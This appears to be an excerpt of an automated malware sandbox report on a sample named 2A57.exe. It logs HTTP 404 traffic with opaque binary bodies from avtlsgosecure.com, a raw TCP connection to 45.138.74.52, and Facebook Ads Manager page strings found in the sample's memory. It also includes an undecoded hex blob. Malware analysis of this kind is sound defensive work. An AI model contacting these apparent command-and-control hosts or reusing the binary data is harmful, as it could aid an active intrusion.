c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 55Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e fc 94 af bb a4 0f 42 bd de 2c fc e8 1c 36 90 fd 85 fc 20 b3 82 95 ae 7e ef 4c 8c a8 47 2e 8d 3d 54 96 4e Data Ascii: %S`Nh&WQY^B,6 ~LG.=TN
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 73Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ee 18 29 85 ef 94 f9 20 b0 8d 91 bb 22 ac 5a 91 b8 06 6e da 3c 43 8f 5c 29 bd c0 ce 1c cc fb 51 80 9d c4 f6 3e ba 45 33 e2 d3 Data Ascii: %S`Nh&WQY^&) "Zn<C\)Q>E3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:13 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 86 a2 fc be 1f 5b b5 c4 22 f0 e8 53 39 9e e7 c9 fe 20 b3 85 83 ac 23 a4 5b 9b Data Ascii: %S`Nh&WQY^["S9 #[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:16 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 42Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 86 a2 fc be 1f 5b b5 c4 22 f0 e8 53 39 9e e7 c9 a3 6f bb 98 95 Data Ascii: %S`Nh&WQY^["S9o
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:18 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 57Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 1d e2 81 b9 e5 bf 54 5d b3 c5 39 f9 b4 0d 33 92 f9 c9 f2 06 bb 82 88 b2 59 8b 0c b3 bf 04 7d c6 25 05 c0 4e 7e b5 Data Ascii: %S`Nh&WQLT]93Y}%N~
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: (Ycontent-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input t equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" 